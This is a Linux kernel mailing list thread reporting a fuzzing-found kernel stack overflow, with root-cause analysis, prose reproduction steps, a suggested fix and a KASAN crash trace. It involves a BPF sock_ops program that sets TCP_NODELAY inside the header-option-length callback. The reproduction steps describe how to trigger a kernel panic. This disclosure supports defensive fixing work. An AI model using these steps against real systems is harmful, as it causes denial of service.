Re: Infinite Recursion / Kernel Stack Overflow in bpf_skops_hdr_opt_len() via TCP_NODELAY setsockopt

Stanislav Fomichev

Apr 13, 2026, 11:55:48 AM
to Quan Sun, dan...@iogearbox.net, b...@vger.kernel.org, ddd...@hust.edu.cn, M2024...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, a...@kernel.org, and...@kernel.org, jiayua...@linux.dev
On 04/13, Quan Sun wrote:
> Our fuzzing found a Stack Guard Page hit / Infinite Recursion vulnerability
> in the Linux TCP BPF Subsystem. The issue is triggered when a
> `BPF_PROG_TYPE_SOCK_OPS` program is attached and uses the `bpf_setsockopt()`
> helper inside the `BPF_SOCK_OPS_HDR_OPT_LEN_CB` callback to set
> `TCP_NODELAY` on the associated socket. This creates a logical loop that
> unconditionally pushes pending frames and re-invokes the same option-length
> BPF callback until the kernel stack overflows.
>
> Reported-by: Quan Sun <202209...@std.uestc.edu.cn>
> Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
> Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
> Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>
>
> ## Root Cause
>
> This vulnerability is caused by a semantic loop created by mixing BPF TCP
> hooks tightly bound to transmission paths with auxiliary socket state
> mutations like TCP Nagle transitions.
>
> 1. A user loads a `BPF_PROG_TYPE_SOCK_OPS` program and attaches it to a
> cgroup via `BPF_CGROUP_SOCK_OPS`.
> 2. The program intercepts `BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB` or
> `BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB` events and sets the
> `BPF_SOCK_OPS_WRITE_HDR_OPT_CB_FLAG` on the socket to enable custom TCP
> header options injection.
> 3. During the standard TCP frame transmission process (e.g., when sending
> data), the kernel needs to calculate the header's precise length. To
> retrieve the size of the injected option, `tcp_established_options()`
> invokes `bpf_skops_hdr_opt_len()`, which correctly triggers the
> `BPF_SOCK_OPS_HDR_OPT_LEN_CB` callback inside the BPF program.
> 4. Inside this callback, the malicious BPF program uses the
> `bpf_setsockopt()` helper function to force `TCP_NODELAY`.
> 5. Down in the kernel, setting `TCP_NODELAY` alters the connection context.
> Doing so invokes `__tcp_sock_set_nodelay()`, which unconditionally calls
> `tcp_push_pending_frames()` to immediately dispatch any packets that were
> previously waiting under the Nagle algorithm logic.
> 6. The recursive sub-call to `tcp_push_pending_frames()` initiates packet
> building again, causing a cascading invocation of
> `tcp_established_options()` -> `bpf_skops_hdr_opt_len()` ->
> `BPF_SOCK_OPS_HDR_OPT_LEN_CB` -> `bpf_setsockopt()` ->
> `tcp_push_pending_frames()`...
> 7. Without a depth limit or re-entrancy blocking condition on these socket
> callbacks, the repetitive nesting rapidly exhausts the kernel stack
> boundaries, pushing past the limits (hitting the `stack guard page`). The
> result is an immediate kernel panic leading to Denial of Service.
>
> #### Execution Flow Visualization
>
> ```text
> Vulnerability Execution Flow
> |
> |--- 1. `BPF_SOCK_OPS_HDR_OPT_LEN_CB` BPF Handler Executed
> |    |\
> |    | `-- `bpf_setsockopt(..., SOL_TCP, TCP_NODELAY, ...)`
> |    |
> |--- 2. `do_tcp_setsockopt()` called by BPF Helper
> |    |\
> |    | `-- `__tcp_sock_set_nodelay()`
> |    |      |
> |    |      `-- `tcp_push_pending_frames()` (Immediate TCP transmission)
> |    |
> |--- 3. Context switches to Frame Packaging
> |    |\
> |    | `-- `tcp_current_mss()`
> |    |      |
> |    |      `-- `tcp_established_options()`
> |    |
> |--- 4. TCP Header calls BPF back again for size computation
> |    |\
> |    | `-- `bpf_skops_hdr_opt_len()`
> |    |      |
> |    |      `-- Invokes BPF Callback: `BPF_SOCK_OPS_HDR_OPT_LEN_CB`
> |    |      |
> |    |      `-- (Reverts to Step 1 directly) Infinite recursion depth.
> <==== KERNEL PANIC
> ```
>
> ## Reproduction Steps
>
> 1. Load a `BPF_PROG_TYPE_SOCK_OPS` BPF program that:
> - Checks the `op` field in the `bpf_sock_ops` context.
> - If the `op` is `BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB` or
> `BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB`, calls the
> `bpf_sock_ops_cb_flags_set()` helper to enable the
> `BPF_SOCK_OPS_WRITE_HDR_OPT_CB_FLAG`.
> - If the `op` is `BPF_SOCK_OPS_HDR_OPT_LEN_CB`, calls the
> `bpf_setsockopt()` helper to forcefully enable `TCP_NODELAY`.
> 2. Attach the loaded program to a chosen cgroup directory using
> `BPF_CGROUP_SOCK_OPS`.
> 3. Trigger a standard TCP connection (e.g., using `connect()`) within the
> targeted cgroup to establish the socket and trigger the initial established
> callbacks.
> 4. Force a packet transmission (e.g., using `send()`). This forces the
> kernel to compute the MSS and invoke the option length callback.
> 5. The forced `TCP_NODELAY` inside the callback will trap the kernel in an
> infinite recursive call sequence traversing `tcp_push_pending_frames()` and
> `bpf_skops_hdr_opt_len()` until the stack overflows, leading to a stack
> guard page crash.

The easiest fix is to probably return early from tcp_push_pending_frames
when has_current_bpf_ctx()?

Quan Sun

Apr 14, 2026, 7:16:15 AM
to dan...@iogearbox.net, b...@vger.kernel.org, ddd...@hust.edu.cn, M2024...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, a...@kernel.org, and...@kernel.org, jiayua...@linux.dev
## KASAN Report

```text
[ 138.173123][ C0] BUG: TASK stack guard page was hit at
ffa000000ceaff88 (stack is ffa000000ceb00)
[ 138.173140][ C0] Oops: stack guard page: 0000 [#1] SMP KASAN NOPTI
[ 138.173151][ C0] CPU: 0 UID: 0 PID: 9894 Comm: poc Not tainted
7.0.0-rc5-g6f6c794d0ff0 #5 PREEMP
[ 138.173164][ C0] Hardware name: QEMU Standard PC (i440FX + PIIX,
1996), BIOS 1.15.0-1 04/01/2014
[ 138.173169][ C0] RIP: 0010:mark_lock+0x1d/0xae0
[ 138.173194][ C0] Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 55
48 89 e5 41 57 41 56 41 55 41 55
[ 138.173204][ C0] RSP: 0018:ffa000000ceaff90 EFLAGS: 00010086
[ 138.173213][ C0] RAX: 72760a0d8792c400 RBX: ff1100002fa255d8 RCX:
ffffffff96d71118
[ 138.173219][ C0] RDX: 0000000000000008 RSI: ff1100002fa258a8 RDI:
ff1100002fa24a80
[ 138.173226][ C0] RBP: ffa000000ceb0028 R08: 0000000000000000 R09:
0000000000000000
[ 138.173232][ C0] R10: 0000000000000000 R11: 0000000000000007 R12:
ff1100002fa258a8
[ 138.173238][ C0] R13: 0000000000000000 R14: 0000000000000012 R15:
0000000000000003
[ 138.173244][ C0] FS: 00007f1ea5b60740(0000)
GS:ff110000cd71d000(0000) knlGS:0000000000000000
[ 138.173255][ C0] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 138.173262][ C0] CR2: ffa000000ceaff88 CR3: 0000000027657000 CR4:
0000000000753ef0
[ 138.173268][ C0] PKRU: 55555554
[ 138.173271][ C0] Call Trace:
[ 138.173275][ C0] <TASK>
[ 138.173280][ C0] __lock_acquire+0x47d/0x2740
[ 138.173295][ C0] lock_acquire+0x1ba/0x360
[ 138.173305][ C0] ? ip_dst_mtu_maybe_forward.constprop.0+0x25/0x6f0
[ 138.173326][ C0] ip_dst_mtu_maybe_forward.constprop.0+0x36/0x6f0
[ 138.173338][ C0] ? ip_dst_mtu_maybe_forward.constprop.0+0x25/0x6f0
[ 138.173350][ C0] ? __pfx_ipv4_mtu+0x10/0x10
[ 138.173360][ C0] tcp_current_mss+0x40e/0x490
[ 138.173375][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.173395][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.173410][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.173432][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.173445][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.173458][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.173469][ C0] __bpf_setsockopt+0x158/0x220
[ 138.173479][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.173491][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.173504][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.173514][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.173535][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.173553][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.173567][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.173584][ C0] tcp_established_options+0x7c4/0xae0
[ 138.173598][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.173614][ C0] tcp_current_mss+0x1d9/0x490
[ 138.173628][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.173648][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.173662][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.173684][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.173696][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.173709][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.173720][ C0] __bpf_setsockopt+0x158/0x220
[ 138.173729][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.173741][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.173753][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.173762][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.173778][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.173796][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.173810][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.173827][ C0] tcp_established_options+0x7c4/0xae0
[ 138.173841][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.173857][ C0] tcp_current_mss+0x1d9/0x490
[ 138.173870][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.173890][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.173905][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.173927][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.173938][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.173951][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.173962][ C0] __bpf_setsockopt+0x158/0x220
[ 138.173972][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.173984][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.173995][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.174004][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.174025][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.174044][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.174057][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.174074][ C0] tcp_established_options+0x7c4/0xae0
[ 138.174088][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.174104][ C0] tcp_current_mss+0x1d9/0x490
[ 138.174117][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.174137][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.174152][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.174174][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.174186][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.174199][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.174210][ C0] __bpf_setsockopt+0x158/0x220
[ 138.174219][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.174231][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.174243][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.174251][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.174268][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.174286][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.174299][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.174316][ C0] tcp_established_options+0x7c4/0xae0
[ 138.174330][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.174346][ C0] tcp_current_mss+0x1d9/0x490
[ 138.174359][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.174379][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.174394][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.174416][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.174428][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.174440][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.174452][ C0] __bpf_setsockopt+0x158/0x220
[ 138.174461][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.174473][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.174485][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.174493][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.174509][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.174527][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.174541][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.174558][ C0] tcp_established_options+0x7c4/0xae0
[ 138.174572][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.174588][ C0] tcp_current_mss+0x1d9/0x490
[ 138.174601][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.174621][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.174636][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.174658][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.174670][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.174682][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.174694][ C0] __bpf_setsockopt+0x158/0x220
[ 138.174703][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.174715][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.174727][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.174735][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.174751][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.174769][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.174783][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.174800][ C0] tcp_established_options+0x7c4/0xae0
[ 138.174813][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.174829][ C0] tcp_current_mss+0x1d9/0x490
[ 138.174843][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.174863][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.174877][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.174899][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.174911][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.174923][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.174935][ C0] __bpf_setsockopt+0x158/0x220
[ 138.174944][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.174956][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.174968][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.174976][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.174992][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.175015][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.175028][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.175045][ C0] tcp_established_options+0x7c4/0xae0
[ 138.175059][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.175075][ C0] tcp_current_mss+0x1d9/0x490
[ 138.175088][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.175108][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.175123][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.175145][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.175156][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.175169][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.175180][ C0] __bpf_setsockopt+0x158/0x220
[ 138.175189][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.175201][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.175213][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.175222][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.175238][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.175256][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.175269][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.175286][ C0] tcp_established_options+0x7c4/0xae0
[ 138.175300][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.175316][ C0] tcp_current_mss+0x1d9/0x490
[ 138.175329][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.175349][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.175363][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.175385][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.175397][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.175410][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.175421][ C0] __bpf_setsockopt+0x158/0x220
[ 138.175430][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.175442][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.175454][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.175462][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.175478][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.175496][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.175510][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.175529][ C0] tcp_established_options+0x7c4/0xae0
[ 138.175543][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.175559][ C0] tcp_current_mss+0x1d9/0x490
[ 138.175573][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.175593][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.175607][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.175629][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.175641][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.175654][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.175665][ C0] __bpf_setsockopt+0x158/0x220
[ 138.175674][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.175686][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.175698][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.175707][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.175723][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.175741][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.175754][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.175771][ C0] tcp_established_options+0x7c4/0xae0
[ 138.175785][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.175801][ C0] tcp_current_mss+0x1d9/0x490
[ 138.175814][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.175834][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.175849][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.175871][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.175883][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.175895][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.175907][ C0] __bpf_setsockopt+0x158/0x220
[ 138.175916][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.175928][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.175940][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.175948][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.175964][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.175982][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.175995][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.176020][ C0] tcp_established_options+0x7c4/0xae0
[ 138.176034][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.176050][ C0] tcp_current_mss+0x1d9/0x490
[ 138.176064][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.176084][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.176098][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.176121][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.176132][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.176145][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.176157][ C0] __bpf_setsockopt+0x158/0x220
[ 138.176166][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.176178][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.176190][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.176198][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.176214][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.176232][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.176246][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.176263][ C0] tcp_established_options+0x7c4/0xae0
[ 138.176277][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.176293][ C0] tcp_current_mss+0x1d9/0x490
[ 138.176306][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.176326][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.176341][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.176363][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.176375][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.176387][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.176399][ C0] __bpf_setsockopt+0x158/0x220
[ 138.176408][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.176420][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.176432][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.176440][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.176456][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.176474][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.176488][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.176505][ C0] tcp_established_options+0x7c4/0xae0
[ 138.176519][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.176534][ C0] tcp_current_mss+0x1d9/0x490
[ 138.176548][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.176568][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.176582][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.176604][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.176616][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.176629][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.176640][ C0] __bpf_setsockopt+0x158/0x220
[ 138.176649][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.176661][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.176673][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.176681][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.176697][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.176715][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.176729][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.176746][ C0] tcp_established_options+0x7c4/0xae0
[ 138.176760][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.176776][ C0] tcp_current_mss+0x1d9/0x490
[ 138.176789][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.176809][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.176823][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.176845][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.176857][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.176870][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.176881][ C0] __bpf_setsockopt+0x158/0x220
[ 138.176890][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.176902][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.176914][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.176923][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.176939][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.176957][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.176970][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.176987][ C0] tcp_established_options+0x7c4/0xae0
[ 138.177001][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.177025][ C0] tcp_current_mss+0x1d9/0x490
[ 138.177038][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.177051][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.177068][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.177083][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.177097][ C0] ? kernel_text_address+0x52/0xa0
[ 138.177111][ C0] ? do_raw_spin_lock+0x130/0x270
[ 138.177124][ C0] ? find_held_lock+0x2b/0x80
[ 138.177140][ C0] ? _raw_spin_unlock_irqrestore+0x5d/0x80
[ 138.177161][ C0] ? lockdep_hardirqs_on+0x7c/0x110
[ 138.177177][ C0] ? _raw_spin_unlock_irqrestore+0x46/0x80
[ 138.177191][ C0] ? stack_depot_save_flags+0x433/0xa30
[ 138.177204][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.177216][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.177228][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.177240][ C0] __bpf_setsockopt+0x158/0x220
[ 138.177249][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.177258][ C0] ? lock_release+0x22d/0x300
[ 138.177271][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.177283][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.177291][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.177307][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.177325][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.177339][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.177354][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.177366][ C0] tcp_established_options+0x7c4/0xae0
[ 138.177379][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.177395][ C0] tcp_current_mss+0x1d9/0x490
[ 138.177409][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.177425][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.177437][ C0] ? is_bpf_text_address+0x9b/0x1b0
[ 138.177449][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.177464][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.177480][ C0] ? lockdep_hardirqs_on+0x7c/0x110
[ 138.177496][ C0] ? _raw_spin_unlock_irqrestore+0x46/0x80
[ 138.177510][ C0] ? stack_depot_save_flags+0x433/0xa30
[ 138.177523][ C0] ? kasan_save_stack+0x34/0x50
[ 138.177537][ C0] ? kasan_save_stack+0x24/0x50
[ 138.177550][ C0] ? kasan_save_track+0x14/0x30
[ 138.177564][ C0] ? __kasan_kmalloc+0xaa/0xb0
[ 138.177579][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.177591][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.177603][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.177615][ C0] __bpf_setsockopt+0x158/0x220
[ 138.177624][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.177636][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.177648][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.177656][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.177672][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.177690][ C0] bpf_skops_hdr_opt_len+0x303/0x440
